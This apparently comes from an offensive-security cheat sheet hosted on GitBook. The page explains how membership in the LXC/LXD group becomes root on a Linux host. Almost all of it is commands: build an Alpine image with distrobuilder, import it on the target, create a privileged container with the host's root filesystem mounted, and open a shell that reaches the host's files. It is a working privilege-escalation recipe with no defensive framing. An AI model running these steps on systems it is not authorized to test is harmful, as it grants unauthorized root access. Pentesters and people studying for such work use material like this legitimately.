🥷
Offensive Security
  • Shells and stuffs
    • Bind Shell
    • Reverse Shell
    • TTY Shell
    • File Transfer
    • Handmade Network Scan
  • Services enumeration
    • DNS Enumeration
    • SMB Enumeration
    • NFS Enumeration
  • Linux Privilege Escalation
    • Useful Tools
    • Hijack X11 session
    • Linux capabilities
    • LXC membership
  • Windows Privilege Escalation
    • Useful Tools
  • Password Attacks
    • Build Wordlist
    • Network Service Attacks
    • Password Cracking
  • Active Directory
    • AD CS
  • OSINT
    • Google Dorks
Powered by GitBook
On this page
  1. Linux Privilege Escalation

LXC membership

On the attacker machine, install distro builder projet:

#Install requirements
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
#Clone repo
git clone https://github.com/lxc/distrobuilder
#Make distrobuilder
cd distrobuilder
make
#Prepare the creation of alpine
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
#Create the container
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

lxd.tar.xz and rootfs.squashfs are built. Upload them on the vulnerable machine.

From the vulnerable machine, add the Alpine image as follows:

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list #You can see your new imported image

Then, create a container from this imported LXC image and add root path:

lxc init alpine privesc -c security.privileged=true --alias=alpine
lxc list #List containers

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

Finally, run the container:

lxc start privesc
lxc exec privesc /bin/sh

Host filesystem can be accessed from /mnt/root.

PreviousLinux capabilitiesNextUseful Tools

Last updated 2 years ago